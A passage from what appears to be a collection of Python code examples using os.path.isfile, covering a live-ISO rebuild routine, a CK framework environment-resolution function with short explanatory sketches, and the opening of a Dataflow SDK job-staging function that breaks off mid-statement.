    message.sub_debug('Architecture', arch)
    message.sub_debug('Distribution (DISTRIB_ID)', distrib)
    message.sub_debug('Release (DISTRIB_RELEASE)', release)

    # Remove files, by name, that we know we must repopulate if they exist.
    message.sub_info('Cleaning up')
    cleanup_files = ['casper/filesystem.squashfs', 'casper/initrd.lz', \
        'casper/vmlinuz', 'casper/vmlinuz.efi', 'casper/filesystem.manifest', \
        'casper/filesystem.size']
    cleanup_files.extend(glob.glob('.disk/casper-uuid-*'))
    for sfile in cleanup_files:
        full_file = misc.join_paths(config.ISO_DIR, sfile)
        if os.path.exists(full_file):
            message.sub_debug('Removing', full_file)
            os.unlink(full_file)

    # Define the checksum files, and the ISO filename.
    md5sum_iso_file = misc.join_paths(config.WORK_DIR, 'md5sum')
    sha1sum_iso_file = misc.join_paths(config.WORK_DIR, 'sha1sum')
    sha256sum_iso_file = misc.join_paths(config.WORK_DIR, 'sha256sum')
    iso_file = '%s/%s-%s-%s.iso' % (config.WORK_DIR, distrib, arch, release)
    if os.path.exists(iso_file):
        message.sub_debug('Removing', iso_file)
        os.unlink(iso_file)
    if os.path.exists(md5sum_iso_file):
        message.sub_debug('Removing', md5sum_iso_file)
        os.unlink(md5sum_iso_file)
    if os.path.exists(sha1sum_iso_file):
        message.sub_debug('Removing', sha1sum_iso_file)
        os.unlink(sha1sum_iso_file)
    if os.path.exists(sha256sum_iso_file):
        message.sub_debug('Removing', sha256sum_iso_file)
        os.unlink(sha256sum_iso_file)

    # Detect files needed for booting, the kernel, initramfs, xen and anything else.
    detect_boot()
    if not vmlinuz:
        message.sub_info('Re-installing kernel')
        misc.chroot_exec(('apt-get', 'purge', '--yes', 'linux-image*', '-q'))
        misc.chroot_exec(('apt-get', 'install', '--yes', \
            'linux-image-generic', '-q'))
        misc.chroot_exec(('apt-get', 'clean'))
    else:
        message.sub_info('Updating initramfs')
        misc.chroot_exec(('update-initramfs', '-k', 'all', '-t', '-u'))
    detect_boot()

    if not initrd or not vmlinuz:
        raise(message.exception('Missing boot file (initrd or vmlinuz)'))
    else:
        message.sub_info('Copying boot files')
        message.sub_debug('Initrd', initrd)
        message.sub_debug('Vmlinuz', vmlinuz)
        misc.copy_file(initrd, misc.join_paths(config.ISO_DIR, 'casper/initrd.lz'))
        
        # FIXME: extend to support grub
        efi_boot_entry = False
        isolinux_dir = config.ISO_DIR + '/isolinux'
        if os.path.isdir(isolinux_dir):
            for sfile in os.listdir(isolinux_dir):
                if sfile.endswith('.cfg') and misc.search_file('vmlinuz.efi', isolinux_dir + '/' + sfile):
                    message.sub_debug('Found EFI entry in isolinux conf', sfile)
                    efi_boot_entry = True
        if os.path.isdir(misc.join_paths(config.ISO_DIR, 'efi/boot')) or \
            efi_boot_entry:
            message.sub_debug('Copying EFI vmlinuz')
            misc.copy_file(vmlinuz, misc.join_paths(config.ISO_DIR, \
                'casper/vmlinuz.efi'))
            os.link(misc.join_paths(config.ISO_DIR, \
                'casper/vmlinuz.efi'), misc.join_paths(config.ISO_DIR, \
                'casper/vmlinuz'))
            # EFI Kernels are still loadable by grub, modern ISOs lack a bare vmlinuz.
            # mkisofs/genisoimage -cache-inodes reuses hard linked inodes.
        else:
            misc.copy_file(vmlinuz, misc.join_paths(config.ISO_DIR, 'casper/vmlinuz'))
            # We only need to copy the bare kernel if we're not using EFI at all.

    # Copy optional boot-enablement packages onto the ISO, if found.
    if mt86plus:
        message.sub_debug('Memtest86+ kernel', mt86plus)
        misc.copy_file(mt86plus, misc.join_paths(config.ISO_DIR, 'install/mt86plus'))
    if xen_kernel:
        message.sub_debug('Xen kernel', xen_kernel)
        misc.copy_file(xen_kernel, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(xen_kernel)))
    if xen_efi:
        message.sub_debug('Xen EFI kernel', xen_efi)
        misc.copy_file(xen_efi, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(xen_efi)))
    if ipxe_kernel:
        message.sub_debug('iPXE kernel', ipxe_kernel)
        misc.copy_file(ipxe_kernel, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(ipxe_kernel)))
    if ipxe_efi:
        message.sub_debug('iPXE EFI kernel', ipxe_efi)
        misc.copy_file(ipxe_efi, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(ipxe_efi)))

    message.sub_info('Extracting casper UUID')
    confdir = config.FILESYSTEM_DIR + '/conf'
    if os.path.isdir(confdir):
        shutil.rmtree(confdir)
    os.makedirs(confdir)
    try:
        misc.chroot_exec('zcat ' + initrd.replace(config.FILESYSTEM_DIR, '') + ' | cpio --quiet -id conf/uuid.conf', \
            shell=True, cwd=config.FILESYSTEM_DIR)
        kernel = re.search('initrd.img-*.*.*-*-(.*)', initrd).group(1)
        message.sub_debug('Kernel', kernel)
        misc.copy_file(confdir + '/uuid.conf', misc.join_paths(config.ISO_DIR, \
            '.disk/casper-uuid-' + kernel))
    finally:
        shutil.rmtree(confdir)

    # Define some default compression parameters, including a 1MB blocksize for all compressors.
    compression_parameters = ('-b', '1048576', '-comp', config.COMPRESSION)
    if config.COMPRESSION == 'xz':  # Append additional compression parameters for xz.
        # Using the branch-call-jump filter provides a compression boost with executable code.
        # This can save a hundred megabytes easily, on an 800MB ISO. The dictionary size must
        # match the block size, and it's advisable to use larger block sizes, like 1MB or 4MB.
        compression_parameters += ('-Xbcj', 'x86', '-Xdict-size', '100%')
    message.sub_info('SquashFS Compression parameters', compression_parameters)

    # Create the compressed filesystem
    message.sub_info('Creating SquashFS compressed filesystem')
    make_squash_fs = ('mksquashfs', config.FILESYSTEM_DIR, \
        misc.join_paths(config.ISO_DIR, 'casper/filesystem.squashfs'), \
        '-wildcards', '-no-recovery', '-noappend', \
        '-ef', os.path.join(sys.prefix, 'share/customizer/exclude.list'))
    misc.system_command(make_squash_fs + compression_parameters)

    message.sub_info('Checking SquashFS filesystem size')
    sfs_size = os.path.getsize(misc.join_paths(config.ISO_DIR, \
        'casper/filesystem.squashfs'))
    message.sub_debug('SquashFS filesystem size', sfs_size)
    if sfs_size > 4000000000:
        raise(message.exception('The SquashFS filesystem size is greater than 4GB'))

    message.sub_info('Creating filesystem.size')
    fs_size = 0
    for root, subdirs, files in os.walk(config.FILESYSTEM_DIR):
        for sfile in files:
            sfull = os.path.join(root, sfile)
            if os.path.islink(sfull):
                continue
            # FIXME: respect ignored files from exclude.list
            fs_size += os.path.getsize(sfull)
    message.sub_debug('Root filesystem size', fs_size)
    misc.write_file(misc.join_paths(config.ISO_DIR, \
        'casper/filesystem.size'), str(fs_size))

    message.sub_info('Creating filesystem.manifest')
    lpackages = misc.chroot_exec(('dpkg-query', '-W', \
        '--showformat=${Package} ${Version}\\n'), prepare=False, mount=False, \
        output=True)
    message.sub_debug('Packages', lpackages)
    misc.write_file(misc.join_paths(config.ISO_DIR, \
        'casper/filesystem.manifest'), lpackages)

    # FIXME: do some kung-fu to check if packages are installed
    # and remove them from filesystem.manifest-remove if they are not

    # Creating a md5sum.txt file fixes lubuntu's integrity check.
    md5sums_file = misc.join_paths(config.ISO_DIR, 'md5sum.txt')
    if os.path.isfile(md5sums_file):
        message.sub_info('Creating md5sum.txt')
        misc.write_file(md5sums_file, '')
        for sfile in misc.list_files(config.ISO_DIR):
            if sfile.endswith('md5sum.txt'):
                continue
            if sfile.endswith('SHA256SUMS'):
                continue
            message.sub_debug('MD5 Checksumming', sfile)
            checksum = misc.generate_hash_for_file('md5', sfile)
            misc.append_file(md5sums_file, checksum + '  .' + \
                sfile.replace(config.ISO_DIR, '') +'\n')

    # Creating a SHA256SUMS file fixes ubuntu-mini-remix's integrity check.
    shasums_file = misc.join_paths(config.ISO_DIR, 'SHA256SUMS')
    if os.path.isfile(shasums_file):
        message.sub_info('Creating SHA256SUMS')
        misc.write_file(shasums_file, '')
        for sfile in misc.list_files(config.ISO_DIR):
            if sfile.endswith('md5sum.txt'):
                continue
            if sfile.endswith('SHA256SUMS'):
                continue
            message.sub_debug('SHA256 Checksumming', sfile)
            checksum = misc.generate_hash_for_file('sha256', sfile)
            misc.append_file(shasums_file, checksum + '  .' + \
                sfile.replace(config.ISO_DIR, '') +'\n')

    # Create the ISO filesystem
    message.sub_info('Creating ISO')
    os.chdir(config.ISO_DIR)
    misc.system_command(('xorriso', '-as', 'mkisofs', '-r', '-V', \
        distrib + '-' + arch + '-' + release, '-b', 'isolinux/isolinux.bin', \
        '-c', 'isolinux/boot.cat', '-J', '-l', '-no-emul-boot', \
        '-boot-load-size', '4', '-boot-info-table', '-o', iso_file, \
        '-cache-inodes', '-input-charset', 'utf-8', '.'))

    message.sub_info('Creating ISO checksums')
    md5checksum = misc.generate_hash_for_file('md5', iso_file)
    message.sub_info('ISO md5 checksum', md5checksum)
    misc.append_file(md5sum_iso_file, md5checksum + '  .' + \
        iso_file.replace(config.WORK_DIR, '') +'\n')
    sha1checksum = misc.generate_hash_for_file('sha1', iso_file)
    message.sub_info('ISO sha1 checksum', sha1checksum)
    misc.append_file(sha1sum_iso_file, sha1checksum + '  .' + \
        iso_file.replace(config.WORK_DIR, '') +'\n')
    sha256checksum = misc.generate_hash_for_file('sha256', iso_file)
    message.sub_info('ISO sha256 checksum', sha256checksum)
    misc.append_file(sha256sum_iso_file, sha256checksum + '  .' + \
        iso_file.replace(config.WORK_DIR, '') +'\n')

    message.sub_info('Successfully created ISO image', iso_file)
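
Note: rebuild.py uses os.path.isfile in two roles: hard sanity checks
(etc/lsb-release must exist or the build aborts) and keeping a marker file in
sync with reality (.disk/base_installable should exist exactly when ubiquity
is installed). A minimal sketch of the second pattern, with illustrative
paths:

import os

# Keep 'marker' present exactly when 'feature' is installed, mirroring
# the base_installable handling above.
def sync_marker(feature, marker):
    if os.path.isfile(feature):
        if not os.path.isfile(marker):
            open(marker, 'w').close()
    elif os.path.isfile(marker):
        os.unlink(marker)

sync_marker('/usr/bin/ubiquity', '/tmp/base_installable')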

Example 10

Project: ck-env
Source File: module.py
View license
def set(i):
    """
    Input:  {
              (host_os)              - host OS (detect, if omitted)
              (target_os)            - target OS (detect, if omitted)
              (target_device_id)     - target device ID (detect, if omitted)

              (repo_uoa)             - repo where to limit search

              (uoa)                  - environment UOA entry
               or
              (tags)                 - search UOA by tags (separated by comma)

              (no_tags)              - exclude entries with these tags separated by comma

              (local)                - if 'yes', add host_os, target_os, target_device_id to search

              (key)                  - key from deps (to set env with path)
              (name)                 - user-friendly name of the dependency (if needs to be resolved)

              (deps)                 - already resolved deps
              (skip_auto_resolution) - if 'yes', do not check if deps are already resolved
              (skip_default)         - if 'yes', skip detection of default installed software version
              (skip_pruning_by_other_deps) - if 'yes', do not prune available envs using other resolved deps

              (bat_file)             - if !='', use this filename to generate/append bat file ...
              (bat_new)              - if 'yes', start new bat file

              (env)                  - existing environment

              (print)                - if 'yes', print found environment

              (random)               - if 'yes' and there is a choice, select random
                                       (useful for quiet experiment crowdsourcing such as sw/hw crowdtuning)

              (quiet)                - if 'yes', automatically provide default answer to all questions when resolving dependencies ... 
            }

    Output: {
              return           - return code =  0, if successful
                                             = 32, if environment was deleted (env_uoa - env which was not found)
                                             >  0, if error
              (error)          - error text if return > 0

              env_uoa          - found environment UOA
              env              - updated environment
              bat              - string for bat file
              lst              - all found entries
              dict             - meta of the selected env entry
              detected_version - detected version of a software
            }

    """

    import os
    import copy
    import json

    o=i.get('out','')
    oo=''
    if o=='con': oo='con'

    ran=i.get('random','')
    quiet=i.get('quiet','')

    name=i.get('name','')

    # Clean output file
    sar=i.get('skip_auto_resolution','')
    cdeps=i.get('deps',{})

    sd=i.get('skip_default','')

    bf=i.get('bat_file','')
    if bf!='' and os.path.isfile(bf): os.remove(bf)

    # Check host/target OS/CPU
    hos=i.get('host_os','')
    tos=i.get('target_os','')
    tdid=i.get('target_device_id','')
    if tdid=='': tdid=i.get('device_id','')

    user_env=False
    if hos!='' or tos!='' or tdid!='': user_env=True

    # Get some info about OS
    ii={'action':'detect',
        'module_uoa':cfg['module_deps']['platform.os'],
        'host_os':hos,
        'target_os':tos,
        'device_id':tdid,
        'skip_info_collection':'yes'}
    r=ck.access(ii)
    if r['return']>0: return r

    hos=r['host_os_uid']
    hosx=r['host_os_uoa']
    hosd=r['host_os_dict']

    ck_os_name=hosd['ck_name']

    tos=r['os_uid']
    tosx=r['os_uoa']
    tosd=r['os_dict']

    # Check if base is different
    x1=hosd.get('base_uid','')
    x2=hosd.get('base_uoa','')
    if x1!='' and x2!='': 
       hos=x1
       hosx=x2
    x1=tosd.get('base_uid','')
    x2=tosd.get('base_uoa','')
    if x1!='' and x2!='': 
       tos=x1
       tosx=x2

    remote=tosd.get('remote','')

    tbits=tosd.get('bits','')

    hplat=hosd.get('ck_name','')

    eset=hosd.get('env_set','')
    svarb=hosd.get('env_var_start','')
    svare=hosd.get('env_var_stop','')
    sdirs=hosd.get('dir_sep','')
    evs=hosd.get('env_var_separator','')
    eifs=hosd.get('env_quotes_if_space','')
    nout=hosd.get('no_output','')

    # Check environment UOA
    enruoa=i.get('repo_uoa','')
    tags=i.get('tags','')
    no_tags=i.get('no_tags','')
    duoa=i.get('uoa','')

    lx=0
    dd={}
    setup={}

    # Search
    ii={'action':'search',
        'module_uoa':work['self_module_uid'],
        'tags':tags,
        'repo_uoa':enruoa,
        'data_uoa':duoa,
        'add_info':'yes',
        'add_meta':'yes'} # Need to sort by version, if ambiguity

    if user_env or i.get('local','')=='yes':
       setup={'host_os_uoa':hos,
              'target_os_uoa':tos,
              'target_os_bits':tbits}
       ii['search_dict']={'setup':setup}

    iii=copy.deepcopy(ii) # may need to repeat after registration

    # Prepare possible warning
    x='required software'
    if name!='': x='"'+name+'"'
    war='no registered CK environment was found for '+x+' dependency with tags="'+tags+'"'
    if len(setup)>0:
       ro=readable_os({'setup':setup})
       if ro['return']>0: return ro
       setup1=ro['setup1']

       war+=' and setup='+json.dumps(setup1)

    # Search for environment entries
    r=ck.access(ii)
    if r['return']>0: return r

    # Prune if needed
    if no_tags!='':
       r=prune_search_list({'lst':r['lst'], 'no_tags':no_tags})
       if r['return']>0: return r

    l=r['lst']
    lx=len(l)

    auoas=[]

    dname=''

    if lx==0 and duoa!='':
       return {'return':33, 'error':'either missing env ('+duoa+') or it exists but something changed in its dependencies or setup ('+str(setup)+')'}

    # If no entries, try to detect default ones and repeat
    history_deps=[]
    showed_warning=False
    if lx==0:
       if o=='con' and tags!='':
          ck.out('')
          ck.out(' ********')
          ck.out(' WARNING: '+war)
          ck.out('')

          showed_warning=True

       # First, try to detect already installed software, but not registered (default)
       if sd!='yes':
          if o=='con':
             ck.out('  Trying to automatically detect required software ...')

          ii={'action':'search',
              'module_uoa':cfg['module_deps']['soft'],
              'tags':tags,
              'add_meta':'yes'}
          rx=ck.access(ii)
          if rx['return']>0: return rx

          slst=rx['lst']

          # Sorting and checking which has detection module
          detected=''
          ssi=0
          found=False
          for q in sorted(slst, key=lambda v: v.get('meta',{}).get('sort',0)):
              met=q.get('meta',{})
              auoa=q['data_uoa']
              auid=q['data_uid']
              aname=met.get('soft_name','')

              auoas.append(q['data_uoa'])
              ds=met.get('auto_detect','')
              if ds=='yes':
                 if auid not in history_deps:
                    # Check target
                    rx=ck.access({'action':'check_target',
                                  'module_uoa':cfg['module_deps']['soft'],
                                  'dict':met.get('customize',{}),
                                  'host_os_uoa':hosx,
                                  'host_os_dict':hosd,
                                  'target_os_uoa':tosx,
                                  'target_os_dict':tosd})
                    if rx['return']>0:
                       continue

                    history_deps.append(auid)
                    ssi+=1

                    if o=='con':
                       ck.out('')
                       ck.out('  '+str(ssi)+') Checking if "'+aname+'" ('+auoa+' / '+auid+') is installed ...')

                    # Detect software
                    ii={'action':'check',
                        'module_uoa':cfg['module_deps']['soft'],
                        'data_uoa':auid,
                        'skip_help':'yes',
                        'host_os':hos,
                        'target_os':tos,
                        'target_device_id':tdid,
#                        'deps':cdeps,
                        'out':oo}
                    if len(setup)>0:
                       ii.update(setup)
                    ry=ck.access(ii)
                    if ry['return']>0:
                       if o=='con':
                          ck.out('  (warning during intermediate step: '+ry['error']+')')
                    else:
                       found=True

                       hdeps=ry.get('deps',{})
                       for hd in hdeps:
                           xhd=hdeps[hd]
                           xxhd=xhd.get('dict',{}).get('soft_uoa','')
                           if xxhd not in history_deps:
                              history_deps.append(xxhd)

          # repeat search if at least one above setup was performed
          if not found:
             if o=='con':
                ck.out('    No software auto-detection scripts found for this software in CK :( ...')

                if len(auoas)>0:
                   ck.out('')
                   ck.out('       Checked following related CK soft entries:')
                   for q in auoas:
                       ck.out('        * '+q)

          else:
             r=ck.access(iii)
             if r['return']>0: return r

             # Prune if needed
             if no_tags!='':
                r=prune_search_list({'lst':r['lst'], 'no_tags':no_tags})
                if r['return']>0: return r

             l=r['lst']
             lx=len(l)

    # Re-check/prune existing environment using already resolved deps
    if lx>0:
       ilx=0
       if i.get('skip_pruning_by_other_deps','')!='yes' and lx>1 and sar!='yes':
          # Try auto-resolve or prune choices
          nls=[]
          for z in range(0, lx):
              j=l[z]
              zm=j.get('meta',{})
              cus=zm.get('customize','')
              zdeps=zm.get('deps',{})

              skip=False
              for q in zdeps:
                  jj=zdeps[q]
                  juoa=jj.get('uoa','')

                  for a in cdeps:
                      if a==q:
                         aa=cdeps[a]
                         if aa.get('skip_reuse','')!='yes':
                             auoa=aa.get('uoa','')

                             # Tricky part: skip this entry when an already resolved dep with the same key points at a different env entry
                             if auoa!=juoa:
                                 skip=True
                                 break

                  if skip: break
              if not skip: nls.append(j)

          l=nls
          lx=len(l)

       # Select sub-deps (sort by version)
       if lx>1:
          ls=sorted(l, key=lambda k: (k.get('info',{}).get('data_name',k['data_uoa']),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 0, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 1, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 2, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 3, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 4, 0)),
                    reverse=True)

          l=ls

          if ran=='yes':
             from random import randint
             ilx=randint(0, lx-1)
          elif quiet=='yes':
             ilx=0
          else:
             if o=='con':
                xq='required software'
                if name!='': xq='"'+name+'"'

                xq+=' with tags="'+tags+'"'

                if len(setup)>0:
                   import json

                   ro=readable_os({'setup':setup})
                   if ro['return']>0: return ro
                   setup1=ro['setup1']

                   xq+=' and setup='+json.dumps(setup1)

                ck.out('')
                ck.out('More than one environment found for '+xq+':')
                zz={}
                for z in range(0, lx):
                    j=l[z]

                    zi=j.get('info',{})
                    zm=j.get('meta',{})
                    zu=j.get('data_uid','')
                    zdn=zi.get('data_name','')
                    cus=zm.get('customize','')
                    zdeps=zm.get('deps',{})
                    xsetup=zm.get('setup',{})
                    xtags=zm.get('tags','')
                    ver=cus.get('version','')

                    xtarget_os_uoa=xsetup.get('target_os_uoa','')

                    xstags=''
                    for t in xtags:
                        if t!='':
                           if xstags!='': xstags+=','
                           xstags+=t

                    zs=str(z)
                    zz[zs]=zu

                    ck.out('')
                    ck.out(zs+') '+zdn+' - v'+ver+' ('+xstags+' ('+zu+'))')

                    if len(zdeps)>0:
                       for j in sorted(zdeps, key=lambda v: zdeps[v].get('sort',0)):
                           jj=zdeps[j]
                           juoa=jj.get('uoa','')
                           jtags=jj.get('tags','')
                           jver=jj.get('ver','')

                           js='                                  '
                           js+='Dependency '+j+' (UOA='+juoa+', tags="'+jtags+'", version='+jver+')'
                           ck.out(js)

                ck.out('')
                rx=ck.inp({'text':'Select one of the options for '+xq+' or press Enter for 0: '})
                x=rx['string'].strip()

                if x=='': x='0'

                if x not in zz:
                   return {'return':1, 'error':'option is not recognized'}

                ilx=int(x)

       if ilx<len(l):
          duid=l[ilx]['data_uid']
          duoa=duid

          dname=l[ilx].get('info',{}).get('data_name','')

          dd=l[ilx].get('meta',{})

          if o=='con' and i.get('print','')=='yes':
             x=duoa
             if duid!=duoa: x+=' ('+duid+')'
             ck.out('CK environment found using tags "'+tags+'" : '+x)

    # No registered environments found and environment UOA is not explicitly defined
    if duoa=='':
#       if o=='con' and tags!='':
       if tags!='':

          if not showed_warning:
             ck.out('==========================================================================================')
             ck.out('WARNING: '+war)

          # Next, try to install via package for a given software
          ck.out('')
          ck.out('  Searching and installing CK software packages with these tags (if exist) ...')

#          if quiet=='yes':
#             ck.out('  Searching and installing package with these tags automatically ...')
#             a='y'
#          else:
#             rx=ck.inp({'text':'  Would you like to search and install package with these tags automatically (Y/n)? '})
#             a=rx['string'].strip().lower()
#
#          if a!='n' and a!='no':
          try:
              save_cur_dir=os.getcwd()
          except OSError:
              os.chdir('..')
              save_cur_dir=os.getcwd()

          vv={'action':'install',
              'module_uoa':cfg['module_deps']['package'],
              'out':oo,
              'tags':tags}
          vv['host_os']=hos
          vv['target_os']=tos
          vv['target_device_id']=tdid

          # Check if there is a compiler in resolved deps to reuse it
          xdeps={}
#             if len(cdeps.get('compiler',{}))>0: xdeps['compiler']=cdeps['compiler']
          if cdeps.get('compiler',{}).get('uoa','')!='': xdeps['compiler']=cdeps['compiler']
#             if len(cdeps.get('compiler-mcl',{}))>0: xdeps['compiler-mcl']=cdeps['compiler-mcl']
          if cdeps.get('compiler-mcl',{}).get('uoa','')!='': xdeps['compiler-mcl']=cdeps['compiler-mcl']
          if len(xdeps)>0: vv['deps']=xdeps

          rx=ck.access(vv)
          if rx['return']==0:
             duoa=rx['env_data_uoa']
             duid=rx['env_data_uid']

             os.chdir(save_cur_dir)
          elif rx['return']!=16:
             return rx

       if duoa=='':
          if o=='con':
             ck.out('    CK packages are not found for this software :( !')
             ck.out('')

             if len(auoas)>0:
                if len(auoas)==1:
                   rx=ck.access({'action':'print_help',
                                 'module_uoa':cfg['module_deps']['soft'],
                                 'data_uoa':auoas[0],
                                 'platform':hplat})

                   rx=ck.inp({'text':'       Would you like to manually register software, i.e. if it is in an unusual path (y/N): '})
                   x=rx['string'].strip().lower()
                   if x=='y' or x=='yes':
                      ck.out('')
                      rx=ck.access({'action':'setup',
                                    'module_uoa':cfg['module_deps']['soft'],
                                    'data_uoa':auoas[0],
                                    'out':'con'})
                      if rx['return']>0: return rx
                      ck.out('')

                else:
                   # Show possible Wiki page
                   rx=ck.inp({'text':'       Would you like to open wiki pages about related software (with possible installation info) (y/N): '})
                   x=rx['string'].strip().lower()

                   if x=='y' or x=='yes':
                      ck.out('')
                      for q in auoas:
                          rx=ck.access({'action':'wiki',
                                        'module_uoa':cfg['module_deps']['soft'],
                                        'data_uoa':q})
                          if rx['return']>0: return rx
                      ck.out('')


          if o=='con':
             ck.out('')
          return {'return':1, 'error':war}

    # Load selected environment entry
    r=ck.access({'action':'load',
                 'module_uoa':work['self_module_uid'],
                 'data_uoa':duoa})
    if r['return']>0: 
       if r['return']==16:
          r['return']=32
          r['env_uoa']=duoa
       return r
    d=r['dict']
    p=r['path']

    dname=r.get('data_name','')
    if dname!='':
        d['data_name']=dname

    suoa=d.get('soft_uoa','')
    cs=None
    if suoa!='':
       r=ck.access({'action':'load',
                    'module_uoa':cfg['module_deps']['soft'],
                    'data_uoa':suoa})
       if r['return']>0: return r

       salias=r['data_alias']
       d['soft_alias']=salias

       # Check if has custom script
       rx=ck.load_module_from_path({'path':r['path'], 'module_code_name':cfg['custom_script_name'], 'skip_init':'yes'})
       if rx['return']==0: 
          cs=rx['code']

    # Check that all sub dependencies still exists (if full path)
    outdated=False
    to_delete=False
    err=''

    edeps=d.get('deps',{}) # dependencies of environment (normally resolved, but may change if software changes)
    for q in edeps:
        qq=edeps[q]
        cqq=qq.get('dict',{}).get('customize',{})
        sfc=cqq.get('skip_file_check','')
        fp=cqq.get('full_path','')

        if sfc!='yes' and fp!='' and not os.path.isfile(fp):
           outdated=True
           err='one of the sub-dependencies ('+q+') has changed (file '+fp+' not found)'
           break

        deuoa=qq.get('uoa','')
        if deuoa!='':
           rx=ck.access({'action':'find',
                         'module_uoa':work['self_module_uid'],
                         'data_uoa':deuoa})
           if rx['return']>0:
              if rx['return']!=16: return rx
              outdated=True
              err='one of the sub-dependencies ('+q+') has changed (CK environment '+deuoa+' not found)'
              break

    # Check if file exists for current dependency
    verx=''
    cus=d.get('customize',{})
    fp=cus.get('full_path','')

    tc='it appears that your environment has changed - '
    if not outdated and fp!='' and cus.get('skip_file_check','')!='yes' and not os.path.isfile(fp):
       err=tc+'software file not found in a specified path ('+fp+')'
       outdated=True

    ver_in_env=cus.get('version','') # detected version during installation
    if not outdated and ver_in_env!='':
       scmd=cus.get('soft_version_cmd',{}).get(ck_os_name,'')
       if scmd!='' and 'parse_version' in dir(cs):
          # Check version (via customized script) ...
          ii={'action':'get_version',
              'module_uoa':cfg['module_deps']['soft'],
              'full_path':fp,
              'bat':'',
              'host_os_dict':hosd,
              'target_os_dict':tosd,
              'cmd':scmd,
              'custom_script_obj':cs}
          rx=ck.access(ii)
          if rx['return']==0:
             verx=rx['version']
             if verx!='' and verx!=ver_in_env:
                err=tc+'version during installation ('+ver_in_env+') is not the same as current version ('+verx+')'
                outdated=True

    if outdated:
       if o=='con':
          ck.out('')
          ck.out('WARNING: '+err)

          ck.out('')
          rx=ck.inp({'text':'Would you like to remove outdated environment entry from CK (Y/n)? '})
          x=rx['string'].strip()

          if x=='n' or x=='no':
             return {'return':1, 'error':err}
          to_delete=True

       # Deleting outdated environment
       if to_delete:
          if o=='con':
             ck.out('')
             ck.out('Removing outdated environment entry '+duoa+' ...')

          rx=ck.access({'action':'delete',
                        'module_uoa':work['self_module_uid'],
                        'data_uoa':duoa})
          if rx['return']>0: return rx

          return {'return':1, 'error':'Outdated environment was removed - please try again!'}

    # Prepare environment and bat
    env=i.get('env',{})
    xenv=d.get('env',{})
    env.update(xenv)

    env_call=hosd.get('env_call','')
    bin_prefix=hosd.get('bin_prefix','')

    # Process CMD first:
    sb=''

    es=d.get('env_script','')
    if es!='':
       pp=os.path.join(p,es)
       if i.get('key','')!='':
          sb+=eset+' CK_ENV_SCRIPT_'+i['key'].upper()+'='+pp+'\n'
       sb+=env_call+' '+pp+'\n'

    # Check bat file
    if bf!='':
       bn=i.get('bat_new','')
       x='a'
       if bn=='yes': x='w'

       try:
          fbf=open(bf, x)
          fbf.write(sb)
       except Exception as e: 
          fbf.close()
          return {'return':1, 'error':'problem writing environment file ('+format(e)+')'}

       fbf.close()

    return {'return':0, 'env_uoa':duoa, 'env':env, 'bat':sb, 'lst':l, 'dict':d, 'detected_version':verx}
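
Note: in set() above, os.path.isfile(fp) is the staleness test: a registered
CK environment is treated as outdated as soon as the file recorded in
customize['full_path'] disappears. A minimal sketch, assuming the same meta
layout:

import os

# An env entry is outdated when its recorded binary is gone, unless the
# entry opted out via skip_file_check.
def is_outdated(meta):
    cus = meta.get('customize', {})
    fp = cus.get('full_path', '')
    if fp == '' or cus.get('skip_file_check', '') == 'yes':
        return False
    return not os.path.isfile(fp)

print(is_outdated({'customize': {'full_path': '/no/such/binary'}}))  # True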

Example 11

Project: DataflowPythonSDK
Source File: dependency.py
View license
def stage_job_resources(
    options, file_copy=_dependency_file_copy, build_setup_args=None,
    temp_dir=None, populate_requirements_cache=_populate_requirements_cache):
  """Creates (if needed) and stages job resources to options.staging_location.

  Args:
    options: Command line options. More specifically the function will expect
      staging_location, requirements_file, setup_file, and save_main_session
      options to be present.
    file_copy: Callable for copying files. The default version will copy from
      a local file to a GCS location using the gsutil tool available in the
      Google Cloud SDK package.
    build_setup_args: A list of command line arguments used to build a setup
      package. Used only if options.setup_file is not None. Used only for
      testing.
    temp_dir: Temporary folder where the resource building can happen. If None
      then a unique temp directory will be created. Used only for testing.
    populate_requirements_cache: Callable for populating the requirements cache.
      Used only for testing.

  Returns:
    A list of file names (no paths) for the resources staged. All the files
    are assumed to be staged in options.staging_location.

  Raises:
    RuntimeError: If files specified are not found or error encountered while
      trying to create the resources (e.g., build a setup package).
  """
  temp_dir = temp_dir or tempfile.mkdtemp()
  resources = []

  google_cloud_options = options.view_as(GoogleCloudOptions)
  setup_options = options.view_as(SetupOptions)
  # Make sure that all required options are specified. There are a few that have
  # defaults to support local running scenarios.
  if google_cloud_options.staging_location is None:
    raise RuntimeError(
        'The --staging_location option must be specified.')
  if google_cloud_options.temp_location is None:
    raise RuntimeError(
        'The --temp_location option must be specified.')

  # Stage a requirements file if present.
  if setup_options.requirements_file is not None:
    if not os.path.isfile(setup_options.requirements_file):
      raise RuntimeError('The file %s cannot be found. It was specified in the '
                         '--requirements_file command line option.' %
                         setup_options.requirements_file)
    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  REQUIREMENTS_FILE)
    file_copy(setup_options.requirements_file, staged_path)
    resources.append(REQUIREMENTS_FILE)
    requirements_cache_path = (
        os.path.join(tempfile.gettempdir(), 'dataflow-requirements-cache')
        if setup_options.requirements_cache is None
        else setup_options.requirements_cache)
    # Populate cache with packages from requirements and stage the files
    # in the cache.
    if not os.path.exists(requirements_cache_path):
      os.makedirs(requirements_cache_path)
    populate_requirements_cache(
        setup_options.requirements_file, requirements_cache_path)
    for pkg in glob.glob(os.path.join(requirements_cache_path, '*')):
      file_copy(pkg, utils.path.join(google_cloud_options.staging_location,
                                     os.path.basename(pkg)))
      resources.append(os.path.basename(pkg))

  # Handle a setup file if present.
  # We will build the setup package locally and then copy it to the staging
  # location because the staging location is a GCS path and the file cannot be
  # created directly there.
  if setup_options.setup_file is not None:
    if not os.path.isfile(setup_options.setup_file):
      raise RuntimeError('The file %s cannot be found. It was specified in the '
                         '--setup_file command line option.' %
                         setup_options.setup_file)
    if os.path.basename(setup_options.setup_file) != 'setup.py':
      raise RuntimeError(
          'The --setup_file option expects the full path to a file named '
